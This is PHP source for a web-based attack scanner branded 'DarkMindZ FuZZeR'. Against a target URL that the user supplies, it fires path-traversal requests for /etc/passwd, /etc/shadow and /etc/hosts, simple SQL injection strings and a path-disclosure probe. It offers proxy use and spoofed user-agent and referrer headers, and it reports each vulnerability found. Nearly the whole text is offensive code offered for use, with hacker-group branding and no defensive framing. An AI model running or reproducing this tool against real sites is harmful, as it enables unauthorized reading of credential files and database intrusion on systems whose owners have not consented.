[ DarkMindZ FuZZeR v1.0 Beta ]
Target:
Extra Options:
Proxy
Proxy on exploiting
Custom User-Agent
Custom Referrer
[ Attack Started ]
\n\n"; $url = $_POST['target']; # Save the target as $url. $curl = curl_init(); # Start cURL, it will be used to get contents of webpage. $newagent = $_POST['changeuseragent']; # checking if a custom useragent is needed $changeagent = $_POST['new_agent']; # the new agent. if($newagent) { $user_agent = $changeagent; } else { $user_agent = "DarkMindZ FuZZeR [ DarkMindZ.com ]"; } curl_setopt($curl, CURLOPT_USERAGENT, $user_agent); # tell cURL to use $user_agent as a useragent. $newref = $_POST['changeref']; # check if a custom refferer is needed. $changeref = $_POST['new_ref']; # the custom ref. if($newref) { $referer = $changeref; } else { $referer = "http://www.darkmindz.com"; } curl_setopt($curl, CURLOPT_REFERER, $referer); # tell cURL to use $referer as a ref. $pr0xy = $_POST['pr0xy']; # check if proxy is needed. $newpr0xy = $_POST['pr0xy_ip'] . ':' . $_POST['pr0xy_port']; # proxy:port if($pr0xy) { curl_setopt($curl, CURLOPT_PROXY, $newpr0xy); # tell cURL to use $newpr0xy as a proxy } $pr0xyspl0it = $_POST['pr0xyspl0it']; # check if we need a phproxy on sploiting $newpr0xyspl0it = $_POST['pr0xyurl']; # the proxy url $usepr0xysploit = FALSE; # default is false.. if($pr0xyspl0it) { $usepr0xysploit = TRUE; $tehpr0xy = $newpr0xyspl0it . "/q="; # set the proxy URL. } #############[START_ROUTINE]############# #############[ATTACK_1]################# $target = $url."../../../../../../../../../../../../../../etc/passwd"; # Try to get /etc/passwd, we go back enough dirs `../../` for most webservers. echo "[+] Attacking /etc/passwd....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); # Tell cURL the target is $url ++ the exploit. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); # Tell cURL to return the source code of page. $return = curl_exec($curl); # Execute cURL if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi("root", $return)) # Check, if `root` is anywhere on the page. there is a high possiblity it is vul to LFI. { echo "[-] LFI Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_1]############## #############[ATTACK_2]############### $target = $url."../../../../../../../../../../../../../../etc/passwd%00"; echo "[+] Attacking /etc/passwd%00....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi("root", $return)) { echo "[-] LFI Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_2]############### #############[ATTACK_3]############## $target = $url."../../../../../../../../../../../../../../etc/shadow"; echo "[+] Attacking /etc/shadow....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi("root", $return)) { echo "[-] LFI Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_3]############## #############[ATTACK_4]############## $target = $url."../../../../../../../../../../../../../../etc/shadow%00"; echo "[+] Attacking /etc/shadow%00....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi("root", $return)) { echo "[-] LFI Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_4]############## #############[ATTACK_5]############## $target = $url."../../../../../../../../../../../../../../etc/hosts"; echo "[+] Attacking /etc/hosts....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi("root", $return)) { echo "[-] LFI Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_5]############## #############[ATTACK_6]############## $target = $url."../../../../../../../../../../../../../../etc/hosts%00"; echo "[+] Attacking /etc/hosts%00....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi("root", $return)) { echo "[-] LFI Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_6]############## #############[ATTACK_7]############## $target = $url."--"; echo "[+] Simple SQL Injection....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi(array("MySQL", "on line", "mysq_query()"), $return)) { echo "[-] SQL Injection Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_7]############## #############[ATTACK_8]############## $target = $url."-- OR a=a/*"; echo "[+] Simple SQL Injection....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi(array("MySQL", "on line", "mysq_query()"), $return)) { echo "[-] SQL Injection Found. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_8]############## #############[ATTACK_9]############## $url1 = str_replace("=", "", $url); $target = $url1."[]=darkmindz.com"; echo "[+] Path Disclosure....
\n\n"; curl_setopt($curl, CURLOPT_URL, $target); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); $return = curl_exec($curl); if($usepr0xysploit) { $target = $tehpr0xy.base64_encode($target); } if(eregi(array("Fatal", "on line", "Error"), $return)) { echo "[-] Path Disclosure. \n\n
"; echo "[ Spl0itZ ]\n\n
"; } #############[/ATTACK_9]############## curl_close($curl); # bai! } ?>
DarkMindZ.com - Think Dark || TheDefaced.org ]